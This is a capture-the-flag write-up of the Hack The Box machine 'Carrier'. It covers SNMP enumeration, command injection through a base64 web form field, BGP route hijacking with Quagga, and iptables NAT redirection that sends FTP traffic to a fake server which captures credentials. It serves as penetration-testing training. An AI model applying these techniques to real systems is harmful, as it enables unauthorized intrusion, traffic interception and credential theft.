Hey guys today Carrier retired and here is my write-up about it. User on this box wasn’t hard to get , but for root it’s a different thing because we will go through some networking tricks and we will perform an attack called bgp hijacking. The overall experience was great and carrier was one of the best boxes on this platfrom. It’s a linux box and its ip is
10.10.10.105 I added it to
carrier.htb. Let’s jump right in !
As always we will start by using nmap to scan for open ports and services.
nmap -sV -sT -sC carrier.htb
We get ftp on port 21 , ssh on port 22 and http on port 80. Some other boxes had anonymous ftp access allowed but here it’s not allowed , also the port is filtered so we are not going to check ftp.
HTTP Initial Enumeration
On http there’s a web application called
Lyghtspeed and we are asked to login. Under “Please login” we see that it’s saying
Error 45007 and
Error 45009 which is interesting.
Next thing to check is sub directories enumeration :
gobuster -u http://carrier.htb/ -w /usr/share/wordlists/dirb/common.txt -t 100 -to 200s ===================================================== Gobuster v2.0.0 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://carrier.htb/ [+] Threads : 100 [+] Wordlist : /usr/share/wordlists/dirb/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 3m20s ===================================================== 2019/03/15 11:50:56 Starting gobuster ===================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /css (Status: 301) /debug (Status: 301) /doc (Status: 301) /fonts (Status: 301) /img (Status: 301) /index.php (Status: 200) /js (Status: 301) /server-status (Status: 403) /tools (Status: 301)
We will only check interesting ones :
It has a php file called
remote.php and by checking it :
It says “License expired, exiting…”
There’s a pdf file and an image , the pdf file is called
error_codes.pdf so it might be helpful because we saw earlier two errors on the login page.
45007 is “License invalid or expired”
45009 is “System credentials have not been set. Default admin user password is set (see chassis serial number)”
So now we know that we need that serial number to be able to login , but how to get it ?
At this point we may think that there are other services running on the box and we have missed them. So before running a full tcp scan we will scan udp first.
nmap -sU carrier.htb
We get dhcps on port 67 and snmp on port 161. Let’s check snmp.
Snmp stands for Simple Network Management Protocols and it’s an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. you can read more about it here
We will use a tool called
snmpwalk , it’s an important tool in snmp enumeration and can tell us a lot of useful information. Read about snmpwalk here
snmpwalk -c public -v 1 carrier.htb
-c for community string ,
-v for version
We only get one result
STRING: "SN#NET_45JDX23" so is that the serial number ? Let’s check
admin : NET_45JDX23
And it worked.
Exploiting RCE and getting user
Dashboard , Tickets and Diagnostics are available. But Monitoring is disabled. Tickets are not important now but we will need them later.
Diagnostics has a button saying
verify status :
After clicking :
By looking at the source we find a hidden field called
check , also if we used burp to intercept the requests we will find it. The value of check is base64 encoded string of “quagga” :
We can try to encode “root” and see what happens :
It gives us a different output :
We can confirm that we have remote code execution by trying something like “quagga && whoami && id”
And we see root , we can easily encode our reverse shell payload and get a reverse shell :
But did we really get root access ?
ifconfig and we see that we are not on the actual host which is
10.10.10.105 , we are on a different one.
Anyway we owned the user flag !
I also wrote a python script to automate the process of getting a reverse shell , I’ll post it later. (Update : Here is the script)
Bgp Hijacking and getting root
We saw “quagga” mentioned in the diagnostics page , but what is quagga ?
Basically quagga is a routing software and since quagga is installed on this host then most likely we are going to perform bgp-hijacking or route-hijacking. I won’t go through a detailed explanation about this attack because that will be off-topic , I will include some resources. In simple words we are going to hijack another network prefixes and announce them to us , so if anybody tried to connect to that network they will connect to us. This is possible because we are on the host that is responsible for routing.
Read about quagga
Bgp Hijacking (wikipedia)
Bgp Hijacking (internetsociety.org)
Bgp Hijacking (blogs.akamai.com)
If we take a look at the tickets again , ticket number 6 :
We will notice this line : “one of their VIP is having issues connecting by FTP to an important server in the 10.120.15.0/24 network” , so on 10.120.15.0 there’s an FTP server and someone is accessing it regularly , on github there’s a python script called fake_ftp which creates an FTP server that steals credentials. We can try it locally with
Now everything is ready , we just need to hijack 10.120.15.0 then run that fake ftp on the host and we will be able to steal credentials , but the script is written in python 2.7 and this host has only python 3 installed :
We can fake an FTP server with
nc or edit the script to work with python3 , but we will do something different , we will edit
iptables rules to route traffic from port 21 on the host to port 21 on our box , so what will finally happen is :
Someone tries to connect to the ftp server –> connects to the router instead of the server –> iptables routes that traffic to our box –> our fake ftp server steals the credentials
in order to perform our attack we will edit
After edits :
The only difference is this line
Now we will run a python simple http server to host the new bgpd.conf :
pythom -m SimpleHTTPServer 80
Then we will delete the old one , download the new conf, edit iptables rules and finally restart the service :
iptables commands :
iptables -t nat -A PREROUTING -p tcp --dport 21 -j DNAT --to-destination 10.10.xx.xx:21
iptables -t nat -A POSTROUTING -j MASQUERADE
Then we will wait for someone to access the fake ftp server
watch cat log.txt this will do
cat log.txt and refresh it every 2 seconds (log.txt is where the captured credentials are stored) :
Finally we get these credentials :
Now we can ssh to the actual box as root :
And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter for awesome resources @Ahm3d_H3sham
Thanks for reading.